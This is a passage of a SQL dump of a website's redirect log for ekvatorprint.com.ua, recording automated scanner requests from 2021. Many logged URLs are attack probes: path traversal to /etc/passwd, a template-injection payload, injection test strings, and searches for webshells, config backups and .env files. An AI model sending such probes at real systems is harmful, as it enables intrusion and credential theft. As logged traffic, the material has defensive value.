00:00:00',301),(20868,'https://ekvatorprint.com.ua/wp-blog-headers.php',NULL,'http://ekvatorprint.com.ua/wp-blog-headers.php','',1,0,'2021-10-03 07:33:37','0000-00-00 00:00:00',301),(20869,'https://ekvatorprint.com.ua/.svn',NULL,'','',2,0,'2021-10-03 22:56:42','0000-00-00 00:00:00',301),(20870,'https://ekvatorprint.com.ua/uploads/up.php',NULL,'','',5,0,'2021-10-05 12:44:32','0000-00-00 00:00:00',301),(20871,'https://ekvatorprint.com.ua/wp-content/upload.php',NULL,'','',1,0,'2021-10-05 12:47:45','0000-00-00 00:00:00',301),(20872,'https://ekvatorprint.com.ua/libraries/hrtp.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/hrtp.php.suspected','',1,0,'2021-10-06 03:50:45','0000-00-00 00:00:00',301),(20873,'https://ekvatorprint.com.ua/logs/errorn.php',NULL,'http://ekvatorprint.com.ua/logs/errorn.php','',1,0,'2021-10-06 04:22:12','0000-00-00 00:00:00',301),(20874,'https://ekvatorprint.com.ua/wp-content/media.php',NULL,'http://ekvatorprint.com.ua/wp-content/media.php','',1,0,'2021-10-06 04:22:29','0000-00-00 00:00:00',301),(20875,'https://ekvatorprint.com.ua/plugins/content/defense.php',NULL,'http://ekvatorprint.com.ua/plugins/content/defense.php','',1,0,'2021-10-06 04:22:29','0000-00-00 00:00:00',301),(20876,'https://ekvatorprint.com.ua/modules/mod_articles_tags/tmpl/bookmark.php',NULL,'http://ekvatorprint.com.ua/modules/mod_articles_tags/tmpl/bookmark.php','',2,0,'2021-10-06 04:54:18','0000-00-00 00:00:00',301),(20877,'https://ekvatorprint.com.ua/skin/error.php',NULL,'http://ekvatorprint.com.ua/skin/error.php','',1,0,'2021-10-06 04:59:00','0000-00-00 00:00:00',301),(20878,'https://ekvatorprint.com.ua/wordpress/wp-activates.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-activates.php','',1,0,'2021-10-06 05:10:10','0000-00-00 00:00:00',301),(20879,'https://ekvatorprint.com.ua/plugins/installer/ddcwika.php',NULL,'http://ekvatorprint.com.ua/plugins/installer/ddcwika.php','',2,0,'2021-10-06 05:56:12','0000-00-00 00:00:00',301),(20880,'https://ekvatorprint.com.ua/libraries/joomla/github/package/issues/data.php.suspected',NULL,'http://ekvatorprint.com.ua/libraries/joomla/github/package/issues/data.php.suspected','',1,0,'2021-10-06 06:28:32','0000-00-00 00:00:00',301),(20881,'https://ekvatorprint.com.ua/wp-content/uploads/estate_templates/wpbricks/doc.php',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/estate_templates/wpbricks/doc.php','',1,0,'2021-10-06 06:35:22','0000-00-00 00:00:00',301),(20882,'https://ekvatorprint.com.ua/templates/jblank/html/mod_banners/mod_banners.php',NULL,'http://ekvatorprint.com.ua/templates/jblank/html/mod_banners/mod_banners.php','',1,0,'2021-10-06 07:54:42','0000-00-00 00:00:00',301),(20883,'https://ekvatorprint.com.ua/templates/ja_purity/404.php',NULL,'http://ekvatorprint.com.ua/templates/ja_purity/404.php','',3,0,'2021-10-06 08:06:14','0000-00-00 00:00:00',301),(20884,'https://ekvatorprint.com.ua/wp-admin/network/site-settings.php',NULL,'http://ekvatorprint.com.ua/wp-admin/network/site-settings.php','',1,0,'2021-10-06 08:16:15','0000-00-00 00:00:00',301),(20885,'https://ekvatorprint.com.ua/includes/inc.php',NULL,'http://ekvatorprint.com.ua/includes/inc.php','',1,0,'2021-10-06 08:36:53','0000-00-00 00:00:00',301),(20886,'https://ekvatorprint.com.ua/wordpress/wp-admins.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-admins.php','',1,0,'2021-10-06 09:26:34','0000-00-00 00:00:00',301),(20887,'https://ekvatorprint.com.ua/wordpress/wp-blog-headers.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-blog-headers.php','',1,0,'2021-10-06 09:38:10','0000-00-00 00:00:00',301),(20888,'https://ekvatorprint.com.ua/phpmyadmin/logo_img.php',NULL,'http://ekvatorprint.com.ua/phpMyAdmin/logo_img.php','',1,0,'2021-10-06 09:38:35','0000-00-00 00:00:00',301),(20889,'https://ekvatorprint.com.ua/plugins/authentication/cookie/htaccess.php',NULL,'http://ekvatorprint.com.ua/plugins/authentication/cookie/htaccess.php','',1,0,'2021-10-06 09:56:18','0000-00-00 00:00:00',301),(20890,'https://ekvatorprint.com.ua/wordpress/wp-loads.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-loads.php','',1,0,'2021-10-06 10:27:46','0000-00-00 00:00:00',301),(20891,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/kamrul13/wp-load.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/kamrul13/wp-load.php','',1,0,'2021-10-06 11:01:50','0000-00-00 00:00:00',301),(20892,'https://ekvatorprint.com.ua/images/xx.txt',NULL,'','',1,0,'2021-10-06 11:08:32','0000-00-00 00:00:00',301),(20893,'https://ekvatorprint.com.ua/delivery',NULL,'https://ekvatorprint.com.ua/contacts','',409,0,'2021-10-06 14:38:54','0000-00-00 00:00:00',301),(20894,'https://ekvatorprint.com.ua/wpconfig.bak.php?act=ul',NULL,'','',13,0,'2021-10-07 02:47:27','0000-00-00 00:00:00',301),(20895,'https://ekvatorprint.com.ua/index.php?option=com_content&view=article&id=19&itemid=20',NULL,'','',2,0,'2021-10-08 15:09:53','0000-00-00 00:00:00',301),(20896,'https://ekvatorprint.com.ua/wp-admin/user/config.bak.php',NULL,'http://www.google.com.hk','',2,0,'2021-10-08 18:08:47','0000-00-00 00:00:00',301),(20897,'https://ekvatorprint.com.ua/wpcss.php',NULL,'http://www.google.com.hk','',2,0,'2021-10-08 18:09:25','0000-00-00 00:00:00',301),(20898,'https://ekvatorprint.com.ua/wpconfig_bak.php',NULL,'http://www.google.com.hk','',2,0,'2021-10-08 18:09:43','0000-00-00 00:00:00',301),(20899,'https://ekvatorprint.com.ua/wp_config_bak.php',NULL,'http://www.google.com.hk','',2,0,'2021-10-08 18:10:01','0000-00-00 00:00:00',301),(20900,'https://ekvatorprint.com.ua/wp-conflg.php',NULL,'http://ekvatorprint.com.ua/wp-conflg.php','',2,0,'2021-10-09 07:31:47','0000-00-00 00:00:00',301),(20901,'https://ekvatorprint.com.ua/wp-content/languages/plugins/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/languages/plugins/index.php','',3,0,'2021-10-09 08:05:34','0000-00-00 00:00:00',301),(20902,'https://ekvatorprint.com.ua/wp-admin/user/mide.php',NULL,'http://ekvatorprint.com.ua/wp-admin/user/mide.php','',2,0,'2021-10-10 03:51:19','0000-00-00 00:00:00',301),(20903,'https://ekvatorprint.com.ua/zz.php',NULL,'http://ekvatorprint.com.ua/zz.php','',1,0,'2021-10-10 03:52:54','0000-00-00 00:00:00',301),(20904,'https://ekvatorprint.com.ua/wp-content/plugins/sid/wp-info.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/sid/wp-info.php','',1,0,'2021-10-10 04:05:58','0000-00-00 00:00:00',301),(20905,'https://ekvatorprint.com.ua/5.php',NULL,'http://ekvatorprint.com.ua/5.php','',7,0,'2021-10-10 04:06:35','0000-00-00 00:00:00',301),(20906,'https://ekvatorprint.com.ua/hfgsgedsfss.php',NULL,'http://ekvatorprint.com.ua/hfgsgedsfss.php','',1,0,'2021-10-10 04:39:10','0000-00-00 00:00:00',301),(20907,'https://ekvatorprint.com.ua/wp-admin/maint/index.php',NULL,'http://ekvatorprint.com.ua/wp-admin/maint/index.php','',2,0,'2021-10-10 04:39:14','0000-00-00 00:00:00',301),(20908,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/helper.php',NULL,'http://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/helper.php','',1,0,'2021-10-10 04:45:37','0000-00-00 00:00:00',301),(20909,'https://ekvatorprint.com.ua/bitrix/admin/content-post.php',NULL,'http://ekvatorprint.com.ua/bitrix/admin/content-post.php','',1,0,'2021-10-10 04:54:11','0000-00-00 00:00:00',301),(20910,'https://ekvatorprint.com.ua/gaegesfes.php',NULL,'http://ekvatorprint.com.ua/gaegesfes.php','',1,0,'2021-10-10 04:55:41','0000-00-00 00:00:00',301),(20911,'https://ekvatorprint.com.ua/wp-atom.php',NULL,'http://ekvatorprint.com.ua/wp-atom.php','',2,0,'2021-10-10 04:55:42','0000-00-00 00:00:00',301),(20912,'https://ekvatorprint.com.ua/bitrix/templates/.default/ajax/images/img.php',NULL,'http://ekvatorprint.com.ua/bitrix/templates/.default/ajax/images/img.php','',1,0,'2021-10-10 04:55:47','0000-00-00 00:00:00',301),(20913,'https://ekvatorprint.com.ua/seaturtle.php',NULL,'http://ekvatorprint.com.ua/seaturtle.php','',2,0,'2021-10-10 05:25:02','0000-00-00 00:00:00',301),(20914,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/m4d/shx.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/m4d/shx.php','',1,0,'2021-10-10 05:28:21','0000-00-00 00:00:00',301),(20915,'https://ekvatorprint.com.ua/wordpress/wp-content/doc.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/doc.php','',2,0,'2021-10-10 05:45:06','0000-00-00 00:00:00',301),(20916,'https://ekvatorprint.com.ua/wp-includes.php',NULL,'http://ekvatorprint.com.ua/wp-includes.php','',1,0,'2021-10-10 06:02:58','0000-00-00 00:00:00',301),(20917,'https://ekvatorprint.com.ua/wp-snapshots/index.php',NULL,'http://ekvatorprint.com.ua/wp-snapshots/index.php','',1,0,'2021-10-10 06:30:04','0000-00-00 00:00:00',301),(20918,'https://ekvatorprint.com.ua/snowwins.php',NULL,'http://ekvatorprint.com.ua/snowwins.php','',1,0,'2021-10-10 06:47:33','0000-00-00 00:00:00',301),(20919,'https://ekvatorprint.com.ua/well-known/pki-validation/wp-conflg.php',NULL,'http://ekvatorprint.com.ua/well-known/pki-validation/wp-conflg.php','',1,0,'2021-10-10 06:50:22','0000-00-00 00:00:00',301),(20920,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/ubh/o.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/ubh/o.php','',2,0,'2021-10-10 06:50:49','0000-00-00 00:00:00',301),(20921,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/elingkuatslamet/local.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/ElingKuatSlamet/local.php','',2,0,'2021-10-10 07:43:25','0000-00-00 00:00:00',301),(20922,'https://ekvatorprint.com.ua/wp-admin/wp-conflg.php',NULL,'http://ekvatorprint.com.ua/wp-admin/wp-conflg.php','',1,0,'2021-10-10 08:28:44','0000-00-00 00:00:00',301),(20923,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/elingkuatslamet/about.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/ElingKuatSlamet/about.php','',1,0,'2021-10-10 08:43:59','0000-00-00 00:00:00',301),(20924,'https://ekvatorprint.com.ua/templates/beez3/css/images.php',NULL,'http://ekvatorprint.com.ua/templates/beez3/css/images.php','',3,0,'2021-10-10 08:45:59','0000-00-00 00:00:00',301),(20925,'https://ekvatorprint.com.ua/assets/images/cp.php',NULL,'http://ekvatorprint.com.ua/assets/images/cp.php','',1,0,'2021-10-10 08:47:00','0000-00-00 00:00:00',301),(20926,'https://ekvatorprint.com.ua/next/apps/files_texteditor/l10n/wp-conflg.php',NULL,'http://ekvatorprint.com.ua/next/apps/files_texteditor/l10n/wp-conflg.php','',1,0,'2021-10-10 09:18:55','0000-00-00 00:00:00',301),(20927,'https://ekvatorprint.com.ua/wp-content/themes/twentytwentyone/404.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/twentytwentyone/404.php','',1,0,'2021-10-10 09:30:29','0000-00-00 00:00:00',301),(20928,'https://ekvatorprint.com.ua/wordpress/wp-content/gel.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/gel.php','',1,0,'2021-10-10 09:31:42','0000-00-00 00:00:00',301),(20929,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/anno1903/wp-load.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/Anno1903/wp-load.php','',1,0,'2021-10-10 09:32:51','0000-00-00 00:00:00',301),(20930,'https://ekvatorprint.com.ua/wp-admin/images/arrows.php',NULL,'http://ekvatorprint.com.ua/wp-admin/images/arrows.php','',1,0,'2021-10-10 10:56:17','0000-00-00 00:00:00',301),(20931,'https://ekvatorprint.com.ua/wp-tracker.php',NULL,'http://ekvatorprint.com.ua/wp-tracker.php','',1,0,'2021-10-10 11:29:40','0000-00-00 00:00:00',301),(20932,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/xnxx/xd.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/xnxx/xd.php','',2,0,'2021-10-10 11:36:25','0000-00-00 00:00:00',301),(20933,'https://ekvatorprint.com.ua/atomlib.php',NULL,'http://ekvatorprint.com.ua/atomlib.php','',2,0,'2021-10-10 11:39:06','0000-00-00 00:00:00',301),(20934,'https://ekvatorprint.com.ua/ocsgewfss.php',NULL,'http://ekvatorprint.com.ua/ocsgewfss.php','',1,0,'2021-10-10 11:42:30','0000-00-00 00:00:00',301),(20935,'https://ekvatorprint.com.ua/bitrix/admin/doc.php',NULL,'http://ekvatorprint.com.ua/bitrix/admin/doc.php','',1,0,'2021-10-10 12:28:03','0000-00-00 00:00:00',301),(20936,'https://ekvatorprint.com.ua/pd.js',NULL,'','',5,0,'2021-10-11 04:29:43','0000-00-00 00:00:00',301),(20937,'https://ekvatorprint.com.ua/.hg',NULL,'','',1,0,'2021-10-11 11:13:45','0000-00-00 00:00:00',301),(20938,'https://ekvatorprint.com.ua/wp-content/plugins/cach/coment/index.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/cach/coment/index.php','',2,0,'2021-10-16 03:29:00','0000-00-00 00:00:00',301),(20939,'https://ekvatorprint.com.ua/?option=com_content&view=article&id=19&itemid=20',NULL,'','',28,0,'2021-10-18 12:25:49','0000-00-00 00:00:00',301),(20940,'https://ekvatorprint.com.ua/sellers.json',NULL,'','',1,0,'2021-10-19 12:32:04','0000-00-00 00:00:00',301),(20941,'https://ekvatorprint.com.ua/ \'a=0',NULL,'https://ekvatorprint.com.ua/ \'A=0','',1,0,'2021-10-20 08:36:43','0000-00-00 00:00:00',301),(20942,'https://ekvatorprint.com.ua/products.json?limit=250',NULL,'','',1,0,'2021-10-20 18:17:10','0000-00-00 00:00:00',301),(20943,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/xnxx/noob.php',NULL,'http://ekvatorprint.com.ua/wordpress/wp-content/plugins/xnxx/noob.php','',1,0,'2021-10-23 04:31:16','0000-00-00 00:00:00',301),(20944,'https://ekvatorprint.com.ua/upl.php',NULL,'','',7,0,'2021-10-23 10:32:13','0000-00-00 00:00:00',301),(20945,'https://ekvatorprint.com.ua/cms',NULL,'','',8,0,'2021-10-26 11:14:40','0000-00-00 00:00:00',301),(20946,'https://ekvatorprint.com.ua/dev',NULL,'','',8,0,'2021-10-26 11:14:40','0000-00-00 00:00:00',301),(20947,'https://ekvatorprint.com.ua/protal',NULL,'','',2,0,'2021-10-26 11:14:41','0000-00-00 00:00:00',301),(20948,'https://ekvatorprint.com.ua/desktop.ini',NULL,'','',3,0,'2021-10-28 12:58:48','0000-00-00 00:00:00',301),(20949,'https://ekvatorprint.com.ua/wp-config_bak.php?x=1',NULL,'','',1,0,'2021-10-29 16:09:48','0000-00-00 00:00:00',301),(20950,'https://ekvatorprint.com.ua/tobey.php',NULL,'','',1,0,'2021-10-31 06:42:16','0000-00-00 00:00:00',301),(20951,'https://ekvatorprint.com.ua/images/google-assist.php',NULL,'','',1,0,'2021-11-01 10:11:31','0000-00-00 00:00:00',301),(20952,'https://ekvatorprint.com.ua/qq.php',NULL,'','',1,0,'2021-11-01 19:13:42','0000-00-00 00:00:00',301),(20953,'https://ekvatorprint.com.ua/oie043abjbq',NULL,'','',1,0,'2021-11-01 22:07:11','0000-00-00 00:00:00',301),(20954,'https://ekvatorprint.com.ua/adoni.php',NULL,'','',1,0,'2021-11-02 18:38:01','0000-00-00 00:00:00',301),(20955,'https://ekvatorprint.com.ua/imprima.php',NULL,'','',1,0,'2021-11-03 12:24:04','0000-00-00 00:00:00',301),(20956,'https://ekvatorprint.com.ua/wp-content_plugins_akismet_widget.php',NULL,'','',1,0,'2021-11-03 21:24:53','0000-00-00 00:00:00',301),(20957,'https://ekvatorprint.com.ua/open',NULL,'','',1,0,'2021-11-06 03:10:52','0000-00-00 00:00:00',301),(20958,'https://ekvatorprint.com.ua/forum.php',NULL,'','',1,0,'2021-11-06 10:08:28','0000-00-00 00:00:00',301),(20959,'https://ekvatorprint.com.ua/fotoredaktor/media/jui/js/jquery.min.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-11-06 11:10:41','0000-00-00 00:00:00',301),(20960,'https://ekvatorprint.com.ua/fotoredaktor/media/jui/js/jquery-noconflict.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-11-06 11:10:42','0000-00-00 00:00:00',301),(20961,'https://ekvatorprint.com.ua/fotoredaktor/media/jui/js/jquery-migrate.min.js?acf16b57b327875815ebef44adc986e1',NULL,'','',2,0,'2021-11-06 11:10:42','0000-00-00 00:00:00',301),(20962,'https://ekvatorprint.com.ua/fotoredaktor/media/plg_content_mavikthumbnails/slimbox2/js/slimbox2.js',NULL,'','',2,0,'2021-11-06 11:10:43','0000-00-00 00:00:00',301),(20963,'https://ekvatorprint.com.ua/fotoredaktor/media/plg_jchoptimize/js/ls.loader.js',NULL,'','',2,0,'2021-11-06 11:10:44','0000-00-00 00:00:00',301),(20964,'https://ekvatorprint.com.ua/fotoredaktor/media/plg_jchoptimize/js/lazysizes.js',NULL,'','',2,0,'2021-11-06 11:10:44','0000-00-00 00:00:00',301),(20965,'https://ekvatorprint.com.ua/fotoredaktor/templates/gk_ilife/lib/scripts/template_scripts.js',NULL,'','',2,0,'2021-11-06 11:10:45','0000-00-00 00:00:00',301),(20966,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=zalupa.info',NULL,'','',1,0,'2021-11-07 07:55:15','0000-00-00 00:00:00',301),(20967,'https://ekvatorprint.com.ua/mpzgr1nxu1ee73',NULL,'','',1,0,'2021-11-09 19:17:38','0000-00-00 00:00:00',301),(20968,'https://ekvatorprint.com.ua/mt/mt-atom.cgi',NULL,'bluehost.com','',2,0,'2021-11-11 13:37:23','0000-00-00 00:00:00',301),(20969,'https://ekvatorprint.com.ua/wp-load.php?wordpress=/9smnxjbj/0529lf.txt&database=3index.php&daksldlkdsadas=1',NULL,'','',1,0,'2021-11-13 05:38:38','0000-00-00 00:00:00',301),(20970,'https://ekvatorprint.com.ua/xmrlpc.php?wordpress=/9smnxjbj/0529lf.txt&database=3index.php&daksldlkdsadas=1',NULL,'','',1,0,'2021-11-13 05:38:40','0000-00-00 00:00:00',301),(20971,'https://ekvatorprint.com.ua/wp-content/360.php?bala=up',NULL,'','',1,0,'2021-11-13 05:38:43','0000-00-00 00:00:00',301),(20972,'https://ekvatorprint.com.ua/wp-content/haccess.php?send=ok',NULL,'','',2,0,'2021-11-13 05:38:45','0000-00-00 00:00:00',301),(20973,'https://ekvatorprint.com.ua/wp-content/style.php?sig=beima&domain=tmvca-edu.org&shell_file=readme&file_name=/pe8l3-style.php',NULL,'','',1,0,'2021-11-13 05:38:51','0000-00-00 00:00:00',301),(20974,'https://ekvatorprint.com.ua/wp-content/style.php?sig=shell519&domain=tmvca-edu.org&shell_file=readme&file_name=/pe8l3-style.php',NULL,'','',1,0,'2021-11-13 05:38:55','0000-00-00 00:00:00',301),(20975,'https://ekvatorprint.com.ua/lock360.php?daksldlkdsadas=1',NULL,'','',5,0,'2021-11-13 05:38:57','0000-00-00 00:00:00',301),(20976,'https://ekvatorprint.com.ua/wikindex.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'','',1,0,'2021-11-13 05:39:07','0000-00-00 00:00:00',301),(20977,'https://ekvatorprint.com.ua/go/add-on/business-continuity/api/plugin?foldername=&pluginname=../../../etc/passwd',NULL,'','',2,0,'2021-11-14 19:25:43','0000-00-00 00:00:00',301),(20978,'https://ekvatorprint.com.ua/config/cam_portal.cgi',NULL,'','',1,0,'2021-11-14 19:25:43','0000-00-00 00:00:00',301),(20979,'https://ekvatorprint.com.ua/login.htm',NULL,'','',1,0,'2021-11-14 19:25:43','0000-00-00 00:00:00',301),(20980,'https://ekvatorprint.com.ua/api/graphql',NULL,'','',2,0,'2021-11-14 19:25:43','0000-00-00 00:00:00',301),(20981,'https://ekvatorprint.com.ua/mobile.html',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20982,'https://ekvatorprint.com.ua/login.html',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20983,'https://ekvatorprint.com.ua/default.htm',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20984,'https://ekvatorprint.com.ua/\\../ssl/yaws-key.pem',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20985,'https://ekvatorprint.com.ua/presentation/html/top/prtinfo.html',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20986,'https://ekvatorprint.com.ua/net/net/net.html',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20987,'https://ekvatorprint.com.ua/sitecore/\'',NULL,'','',1,0,'2021-11-14 19:25:44','0000-00-00 00:00:00',301),(20988,'https://ekvatorprint.com.ua/logon.htm',NULL,'','',1,0,'2021-11-14 19:25:45','0000-00-00 00:00:00',301),(20989,'https://ekvatorprint.com.ua/cs/satellite?pagename=openmarket/xcelerate/admin/webreferences',NULL,'','',3,0,'2021-11-14 21:45:42','0000-00-00 00:00:00',301),(20990,'https://ekvatorprint.com.ua/qvisdvr/',NULL,'','',1,0,'2021-11-14 21:45:42','0000-00-00 00:00:00',301),(20991,'https://ekvatorprint.com.ua/cs/satellite?pagename=openmarket/xcelerate/admin/slots',NULL,'','',2,0,'2021-11-14 22:07:59','0000-00-00 00:00:00',301),(20992,'https://ekvatorprint.com.ua/servlet/uploadservlet',NULL,'','',1,0,'2021-11-14 22:10:36','0000-00-00 00:00:00',301),(20993,'https://ekvatorprint.com.ua/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm',NULL,'','',1,0,'2021-11-14 22:10:37','0000-00-00 00:00:00',301),(20994,'https://ekvatorprint.com.ua/test.txt',NULL,'','',1,0,'2021-11-14 22:10:41','0000-00-00 00:00:00',301),(20995,'https://ekvatorprint.com.ua/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedfiles/20um9q0ynswooryoowg7m8p67ga.jsp',NULL,'','',1,0,'2021-11-14 22:10:41','0000-00-00 00:00:00',301),(20996,'https://ekvatorprint.com.ua/\"-abcd-\"',NULL,'','',1,0,'2021-11-15 03:30:05','0000-00-00 00:00:00',301),(20997,'https://ekvatorprint.com.ua/image/image:/..%2fetc%2fpasswd',NULL,'','',1,0,'2021-11-15 07:39:11','0000-00-00 00:00:00',301),(20998,'https://ekvatorprint.com.ua/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../localconfiguration.php',NULL,'','',1,0,'2021-11-15 07:45:04','0000-00-00 00:00:00',301),(20999,'https://ekvatorprint.com.ua/dashboard/snapshot/{{constructor.constructor(\'alert(document.domain)\')()}}?orgid=1',NULL,'','',1,0,'2021-11-15 07:45:10','0000-00-00 00:00:00',301),(21000,'https://ekvatorprint.com.ua/wt2parser.cgi?home_en',NULL,'','',1,0,'2021-11-15 07:45:11','0000-00-00 00:00:00',301),(21001,'https://ekvatorprint.com.ua/go/admin/pipelines/create?group=defaultgroup',NULL,'','',1,0,'2021-11-15 07:45:14','0000-00-00 00:00:00',301),(21002,'https://ekvatorprint.com.ua/go/add-on/business-continuity/api/cruise_config',NULL,'','',1,0,'2021-11-15 07:45:18','0000-00-00 00:00:00',301),(21003,'https://ekvatorprint.com.ua/autodiscover/autodiscover.json',NULL,'','',1,0,'2021-11-15 07:45:29','0000-00-00 00:00:00',301),(21004,'https://ekvatorprint.com.ua/go/add-on/business-continuity/api/cipher.aes',NULL,'','',1,0,'2021-11-15 07:45:31','0000-00-00 00:00:00',301),(21005,'https://ekvatorprint.com.ua/query?db=db&q=show databases',NULL,'','',1,0,'2021-11-15 07:45:35','0000-00-00 00:00:00',301),(21006,'https://ekvatorprint.com.ua/debug/vars',NULL,'','',1,0,'2021-11-15 07:45:37','0000-00-00 00:00:00',301),(21007,'https://ekvatorprint.com.ua/cps/test_backup_server?action=test_ip&nocontinue=true',NULL,'','',1,0,'2021-11-15 07:45:38','0000-00-00 00:00:00',301),(21008,'https://ekvatorprint.com.ua/sitecore/shell/clientbin/reporting/report.ashx',NULL,'','',1,0,'2021-11-15 07:45:57','0000-00-00 00:00:00',301),(21009,'https://ekvatorprint.com.ua/pentaho/api/userrolelist/systemroles?require-cfg.js',NULL,'','',1,0,'2021-11-15 10:29:03','0000-00-00 00:00:00',301),(21010,'https://ekvatorprint.com.ua/api/userrolelist/systemroles?require-cfg.js',NULL,'','',1,0,'2021-11-15 10:29:06','0000-00-00 00:00:00',301),(21011,'https://ekvatorprint.com.ua/?q=\'-abcd-\'&s=\'-abcd-\'&search=\'-abcd-\'&id=\'-abcd-\'&lang=\'-abcd-\'&keyword=\'-abcd-\'&query=\'-abcd-\'&page=\'-abcd-\'&keywords=\'-abcd-\'&year=\'-abcd-\'&view=\'-abcd-\'&email=\'-abcd-\'&type=\'-abcd-\'&name=\'-abcd-\'&p=\'-abcd-\'&month=\'-abcd-\'&immagine=\'-abcd-\'&list_type=\'-abcd-\'&url=\'-abcd-\'&terms=\'-abcd-\'&categoryid=\'-abcd-\'&key=\'-abcd-\'&l=\'-abcd-\'&begindate=\'-abcd-\'&enddate=\'-abcd-\'',NULL,'','',1,0,'2021-11-16 16:28:59','0000-00-00 00:00:00',301),(21012,'https://ekvatorprint.com.ua/igp5og2mmsa2ld9gy',NULL,'','',1,0,'2021-11-16 22:38:45','0000-00-00 00:00:00',301),(21013,'https://ekvatorprint.com.ua/index.php?id=19&itemid=20&option=com_content&view=article',NULL,'','',4,0,'2021-11-17 04:57:52','0000-00-00 00:00:00',301),(21014,'https://ekvatorprintcomua.s19.yourdomain.com.ua/.env',NULL,'','',1,0,'2021-11-18 18:40:01','0000-00-00 00:00:00',301),(21015,'https://ekvatorprintcomua.s19.yourdomain.com.ua/vendor/.env',NULL,'','',1,0,'2021-11-18 18:40:07','0000-00-00 00:00:00',301),(21016,'https://ekvatorprintcomua.s19.yourdomain.com.ua/storage/.env',NULL,'','',1,0,'2021-11-18 18:40:09','0000-00-00 00:00:00',301),(21017,'https://ekvatorprintcomua.s19.yourdomain.com.ua/public/.env',NULL,'','',1,0,'2021-11-18 18:40:11','0000-00-00 00:00:00',301),(21018,'https://ekvatorprintcomua.s19.yourdomain.com.ua/info.php',NULL,'','',1,0,'2021-11-18 18:40:13','0000-00-00 00:00:00',301),(21019,'https://ekvatorprint.com.ua/info',NULL,'','',1,0,'2021-11-18 18:40:14','0000-00-00 00:00:00',301),(21020,'https://ekvatorprintcomua.s19.yourdomain.com.ua/phpinfo.php',NULL,'','',1,0,'2021-11-18 18:40:15','0000-00-00 00:00:00',301),(21021,'https://ekvatorprintcomua.s19.yourdomain.com.ua/info',NULL,'','',1,0,'2021-11-18 18:40:17','0000-00-00 00:00:00',301),(21022,'https://ekvatorprint.com.ua/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-23 07:56:02','0000-00-00 00:00:00',301),(21023,'https://ekvatorprint.com.ua/chart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-24 16:43:56','0000-00-00 00:00:00',301),(21024,'https://ekvatorprint.com.ua/graph/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-26 02:49:22','0000-00-00 00:00:00',301),(21025,'https://ekvatorprint.com.ua/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-26 06:10:10','0000-00-00 00:00:00',301),(21026,'https://ekvatorprint.com.ua/wp-old',NULL,'http://ekvatorprint.com.ua/wp-old','',8,0,'2021-11-27 19:25:43','0000-00-00 00:00:00',301),(21027,'https://ekvatorprint.com.ua/2018',NULL,'http://ekvatorprint.com.ua/2018','',10,0,'2021-11-27 19:25:46','0000-00-00 00:00:00',301),(21028,'https://ekvatorprint.com.ua/project',NULL,'http://ekvatorprint.com.ua/project','',4,0,'2021-11-27 19:25:51','0000-00-00 00:00:00',301),(21029,'https://ekvatorprint.com.ua/www',NULL,'http://ekvatorprint.com.ua/www','',8,0,'2021-11-27 19:25:55','0000-00-00 00:00:00',301),(21030,'https://ekvatorprint.com.ua/2021',NULL,'http://ekvatorprint.com.ua/2021','',8,0,'2021-11-27 19:25:56','0000-00-00 00:00:00',301),(21031,'https://ekvatorprint.com.ua/newfolder',NULL,'http://ekvatorprint.com.ua/newfolder','',4,0,'2021-11-27 19:25:58','0000-00-00 00:00:00',301),(21032,'https://ekvatorprint.com.ua/bak',NULL,'http://ekvatorprint.com.ua/bak','',8,0,'2021-11-27 19:26:03','0000-00-00 00:00:00',301),(21033,'https://ekvatorprint.com.ua/bac',NULL,'http://ekvatorprint.com.ua/bac','',8,0,'2021-11-27 19:26:04','0000-00-00 